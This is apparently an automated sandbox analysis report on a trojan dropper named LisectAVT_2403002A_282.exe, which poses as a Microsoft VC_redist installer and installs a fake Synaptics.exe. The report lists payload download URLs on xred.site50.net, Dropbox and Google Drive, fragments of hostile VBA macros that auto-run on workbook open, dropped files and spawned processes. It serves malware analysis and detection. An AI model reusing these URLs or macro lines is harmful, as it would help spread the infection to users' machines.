Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
Source: Synaptics.exe.0.dr	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarH
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
Source: license.rtf0.2.dr, license.rtf3.2.dr	String found in binary or memory: https://api.informationprotection.azure.com/api/72f988bf-86f1-4
Source: license.rtf11.2.dr, license.rtf10.2.dr, license.rtf1.2.dr, license.rtf2.2.dr	String found in binary or memory: https://api.informationprotection.azure.com/api/72f988bf-86f1-41af-91ab-2d7cd011db47
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/ercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloa
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
Source: Synaptics.exe.0.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
Source: Synaptics.exe.0.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
Source: Synaptics.exe, 00000003.00000002.3583327352.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2472981090.0000000000741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3~
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
Source: Synaptics.exe, 00000003.00000003.2472981090.0000000000764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
Source: Synaptics.exe, 00000003.00000003.2449020475.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAuthority
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
Source: Synaptics.exe.0.dr	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
Source: Synaptics.exe, 00000003.00000003.2449020475.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3583327352.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.0000000000741000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2437651613.000000000073C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2472981090.0000000000741000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Synaptics.exe, 00000003.00000003.2485181194.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2437651613.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&%aJ
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKs
Source: Synaptics.exe, 00000003.00000002.3583327352.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
Source: Synaptics.exe, 00000003.00000002.3582178717.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX&
Source: Synaptics.exe, 00000003.00000002.3583327352.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqx
Source: Synaptics.exe, 00000003.00000003.2472981090.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3583327352.000000000075D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2449020475.0000000000757000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2485181194.000000000075D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl8
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: Synaptics.exe.0.dr	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000003.00000002.3584110937.0000000002120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.4:49763 version: TLS 1.2

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: 4bzU9tWE.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: WUTJSCBCFX.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: 4bzU9tWE.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: WUTJSCBCFX.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: 4bzU9tWE.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: WUTJSCBCFX.xlsm.3.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: 4bzU9tWE.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: WUTJSCBCFX.xlsm.3.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 6C9CB1AA appears 32 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 6C9C55A2 appears 71 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 00CBFD12 appears 35 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 00CC00F7 appears 655 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 00CC5A7C appears 73 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 00CC1D94 appears 59 times
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: String function: 00CC2F68 appears 462 times

Source: LisectAVT_2403002A_282.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: LisectAVT_2403002A_282.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX822C.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746297934.00000000030B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746376373.0000000001756000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe, 00000000.00000003.1746376373.0000000001756000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName.W vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe, 00000000.00000002.1761512094.0000000001790000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe, 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs LisectAVT_2403002A_282.exe
Source: ._cache_LisectAVT_2403002A_282.exe, 00000001.00000000.1729302247.0000000000CEC000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs LisectAVT_2403002A_282.exe
Source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3582013414.0000000000CEC000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs LisectAVT_2403002A_282.exe
Source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3585088507.000000006C9DF000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamewixstdba.dllL vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe	Binary or memory string: OriginalFileName vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs LisectAVT_2403002A_282.exe
Source: LisectAVT_2403002A_282.exe	Binary or memory string: OriginalFilenameb! vs LisectAVT_2403002A_282.exe
Source: ._cache_LisectAVT_2403002A_282.exe.0.dr	Binary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.L$OriginalFilenameVC_redist.x64.exe vs LisectAVT_2403002A_282.exe

Source: LisectAVT_2403002A_282.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal54.troj.expl.winEXE@11/44@4/4

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CBF996 FormatMessageW,GetLastError,LocalFree,

1_2_00CBF996

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00C913BA GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,

1_2_00C913BA

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CC573B GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,

1_2_00CC573B

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 2_2_6C9CA888 FindResourceExA,GetLastError,LoadResource,GetLastError,SizeofResource,GetLastError,LockResource,GetLastError,

2_2_6C9CA888

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CAEDA9 ChangeServiceConfigW,GetLastError,

1_2_00CAEDA9

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

File created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\

Jump to behavior

Source: Yara match	File source: LisectAVT_2403002A_282.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000000.1715008083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX822C.tmp, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ._cache_LisectAVT_2403002A_282.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: LisectAVT_2403002A_282.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: LisectAVT_2403002A_282.exe	String found in binary or memory: CFailed to initialize engine section.Failed to verify elevation state.Failed to re-launch bundle process after RunOnce: %lsFailed to get current process path.Unable to get resume command line from the registryFailed to schedule restart.Failed to adjust token to add shutdown privileges.Failed to get shutdown privilege LUID.SeShutdownPrivilegeFailed to get process token.engine.cppFailed to pump messages from parent process.Failed to create the message window.Failed to set elevated pipe into thread local storage for logging.Failed to allocate thread local storage for logging.Failed to connect to unelevated process.Failed to launch unelevated process.Failed to create implicit elevated connection name and secret.Unexpected return value from message pump.Failed to start bootstrapper application.Failed to load UX.Failed to create engine for UX.Failed while running Failed to set layout directory variable to value provided from command-line.Failed to set registration variables.Failed to set action variables.Failed to query registration.Failed to check global conditionsFailed to connect to elevated parent process.Failed to create pipes to connect to elevated parent process.Failed to initialize internal cache functionality.Failed to open log.Failed to run bootstrapper application embedded.Failed to connect to parent of embedded process.Setup_FailedtxtFailed to run per-user mode.Failed to run per-machine mode.Failed to run embedded mode.Failed to run RunOnce mode.Invalid run mode.Failed to initialize core.3.7.3813.0Failed to get OS info.Failed to initialize XML util.Failed to initialize Wiutil.Failed to initialize Regutil.Failed to initialize COM.Failed to initialize engine state.

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

File read: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\LisectAVT_2403002A_282.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe"
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Process created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe" -burn.unelevated BurnPipe.{D1F32E49-3F7D-4852-BF07-482476425E70} {3ABCDB34-CFB2-4087-949E-3896BDF3C63B} 6884
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Process created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe "C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe" -burn.unelevated BurnPipe.{D1F32E49-3F7D-4852-BF07-482476425E70} {3ABCDB34-CFB2-4087-949E-3896BDF3C63B} 6884	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: iertutil.dll	Jump to behavior
